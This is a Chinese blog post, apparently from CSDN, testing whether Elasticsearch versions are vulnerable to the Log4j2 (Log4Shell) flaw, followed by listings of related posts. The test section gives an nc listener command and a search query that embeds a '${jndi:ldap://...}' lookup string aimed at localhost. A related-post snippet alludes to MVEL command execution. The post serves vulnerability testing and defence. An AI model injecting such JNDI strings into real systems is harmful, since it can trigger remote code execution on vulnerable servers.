Elasticsearch与最新的log4j2零日漏洞

最新推荐文章于 2024-04-13 03:29:24 发布
最新推荐文章于 2024-04-13 03:29:24 发布
阅读量6.9k 收藏 2
点赞数 2
分类专栏: 点火三周的Elastic Stack专栏 文章标签: elasticsearch 安全 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013613428/article/details/121884479
版权

今天真的是焦头烂额,新出来的这个log4j2零日漏洞看起来杀伤力极大,影响了Apache Struts2, Apache Solr, Apache Druid, Apache Flink等重量级的开源项目。当然也包括我们的Elasticsearch。在官方正式的通告、解决方案,补丁出来之前,我这里先简答说一下我个人的测试结果(注意,不代表官方!)

划重点:

我个人的测试结果是:只有ES 5+JDK8能复现。ES 5+JDK12,ES 6+JDK8,ES 7+JDK8均无法进行远程代码执行

测试方案:

  • 使用nc命令,查看网络连接情况,这里我监控的是1388接口: nc -l 1388
  • 构造特殊查询,使ES打印出会访问1388端口的ldap语句:
// 输入代码内容
{
  "query": {
    "bool": {
      "filter": {
        "bool": {
          "must": [
            {
              "term": {
                "call_date": "${jndi:ldap://127.0.0.1:1388/a}"
              }
            }
          ]
        }
      }
    }
  }
}
  • 然后查看特定端口会不会被连接

最低0.47元/天 解锁文章
点火三周
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Elasticsearch Log4j漏洞快速修复步骤
陈万洲的专栏
12-17 1万+
Elasticsearch Log4j漏洞快速修复步骤
ElasticSearch 5.4 的测试java工程 依赖包很全 有配置好的log4j
10-24
ElasticSearch 5.4 的测试java工程 依赖包很全 有配置好的log4j 导入就能测
ElasticSearch 命令执行漏洞(CVE-2014-3120),2024年最新37岁程序员被裁
最新发布
2401_83974607的博客
04-13 377
由于这是一个历史上的漏洞,如果你现在正在使用的 Elasticsearch最新的稳定版本,那么你应该已经不受此漏洞的影响。不过,仍然建议定期更新你的 Elasticsearch 实例以获取最新安全修复和其他改进。
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
qq_40864421的博客
12-14 5495
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
Elasticsearch 中缓解 Log4j2/Log4Shell 漏洞
Elastic 中国社区官方博客
12-16 2084
作者:Philipp Krenn 原文:Mitigate Log4j2 / Log4Shell in Elasticsearch 注:本页面内容为本人截至2021-12-14 18:30 UTC的当前理解结果。 Log4j2 安全问题 (CVE-2021-44228),也称为 Log4Shell,影响版本 2.0-beta9 到 2.14.1 并在日志库的 2.15.0 中修复,很糟糕。远程代码执行 (RCE) 的漏洞得分为 10 分(满分 10 分)——利用它很简单。 全面评估应用程序的风险也很复
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 297
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
Elasticsearch未授权访问漏洞
12-22 7155
  Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
log4j2-elasticsearchLog4j2 Elasticsearch Appender插件
03-04
log4j2-elasticsearch-jest与Elasticsearch 2.x,5.x,6.x和7.x集群兼容的 log4j2-elasticsearch2-bulkprocessor与2.x群集兼容的 log4j2-elasticsearch5-bulkprocessor与5.x和6.x集群兼容的 log4j2-elasticsearch6-...
log4j-2-elastic:Appender for Elasticsearch,具有所有Log4j 2功能的支持
05-26
log4j-2-弹性 我创建了这个项目,以共享和增强附加程序,该附加程序将消息直接记录到集群中。 在某些特定情况下,这种将日志聚合到Elasticsearch中的方法可以很好地替代Elastic Beats。特征该产品包括一些标准和某些...
log4stash:将log4net消息记录到ElasticSearch的模块
05-23
log4stash log4stash是一个附加程序,用于将消息记录到文档数据库中。 ElasticSearch提供了强大的全文本搜索引擎和分析功能,因此可以快速将错误和消息编入索引并轻松进行搜索。 log4stash提供了一些日志记录过滤...
log4j-core-2.17.0.jar
12-22
log4j-core-2.17.0.jar
log4j2-logstash布局
03-03
log4j2-logstash-json 经过测试 logstash:5 log4j2:2.7 来自fork Logstash配置 input { tcp { port => 5001 codec => json_lines } } ## Add your filters / logstash plugins configuration here filter{...
elasticsearch log4j 漏洞修复
weixin_43725548的博客
12-14 6257
项目场景: ES版本 : elasticsearch-7.6.1 问题描述: 最近被曝出来Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码 数据传输过程中数据不时出现丢失的情况,偶尔会丢失一部分数据 查了一下服务器,发现 ES 服务刚好使用了 Log4j。现在国内写的人比较少,我便记录一下 解决方案: 查询出都 ES 服务都哪些地方使用了该文件(我这里将 log4j 已经替换成了 2.15 版本,替换前的版本好像是
elasticsearch-6.6.0 关于Log4j2远程代码执行漏洞的处理
weixin_44855207的博客
12-23 1481
问题 Apache Log4j2远程代码执行漏洞 elasticsearch 6.6.0 版本使用的是2.11.1版本Log4j所有也存在这个漏洞,需要进行log4j升级。 测试过的版本:6.6.0 和5.6.5 解决办法 首先扫描log4j的jar包文件位置。每个人和公司扫描的方式不一致,在这里就不写了。 下面是我扫描到的我的es中的log4j, [VULN] version:2.11.1 /export/servers/es/elasticsearch-6.6.0/lib/log4j-core-2.
ElasticSearch 命令执行漏洞(CVE-2014-3120)
weixin_59086772的博客
01-04 1939
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
Elasticsearch未授权访问漏洞(Es未授权访问)
热门推荐
m0_67402564的博客
04-18 1万+
Elasticsearch是一个开源的高扩展的分布式全文检索引擎,它可以近乎实时的存储、检索数据;本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据。Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 当ElasticSearch的节点启动后,它会利用多播(multicast)(或者单播,如果用户更改了配置)寻找集群中的其它节点,并与之建立连接。这个过程
Elasticsearch 解决 log4j 安全漏洞 - 升级镜像
咸鱼老罗的博客
12-15 3345
概论 Apache Log4j 2 被披露出存在严重代码执行漏洞,目前官方已发布正式安全公告及版本,漏洞编号:CVE-2021-44228,漏洞被利用可导致服务器被入侵等危害。 公司 ES 使用 Log4j 2 组件,存在安全问题,升级 ES 镜像中的 Log4j 2 版本解决该问题。 原理 java 项目只用替换编译出来的 jar 包就可以。 快速教程 下载 log4j-core-2.16.jar 和 log4j-api-2.16.jar https://repo.maven.apache.org/ma
Elasticsearch 未授权访问漏洞
龙卷风摧毁停车场
03-08 5354
ElasticSearch 是一款 Java 编写的企业级搜索服务,启动此服务默认开放 HTTP-9200 端口,可被非法操作数据。
elasticsearch log4j2.properties
01-17
elasticsearch log4j2.properties是用于配置elasticsearch日志记录工具log4j2的属性文件。log4j2elasticsearch用于记录系统日志的工具,通过配置log4j2.properties文件可以定义日志的输出位置、格式和级别等相关信息。 首先,log4j2elasticsearch中使用的目的是帮助开发人员和系统管理员对elasticsearch进行故障排除和监控。通过日志记录,可以了解系统的运行状态、发现问题和异常,从而及时采取措施解决。而log4j2.properties文件则是对日志记录进行属性配置的文件。 在log4j2.properties文件中,可以定义多个logger,每个logger对应不同的日志输出方式。通常,我们可以定义一个根logger和多个自定义logger。根logger通常用于记录整个系统的日志,而自定义logger可以针对具体的模块、组件进行日志记录。 在每个logger里,可以定义日志输出的级别(如TRACE、DEBUG、INFO、WARN、ERROR和FATAL),级别越高,记录的日志也越详细。除了级别,还可以配置日志输出的格式,如日期格式、日志内容格式等。 此外,log4j2.properties文件还可以配置日志输出的位置。可以将日志输出到控制台、文件、数据库等不同的目的地。在配置日志输出的位置时,可以指定日志文件的名称、路径和最大大小等属性。 总而言之,elasticsearch log4j2.properties文件用于配置log4j2日志记录工具的属性,通过它我们可以定义日志的输出位置、格式和级别,使系统管理员和开发人员更好地进行故障排除和监控工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值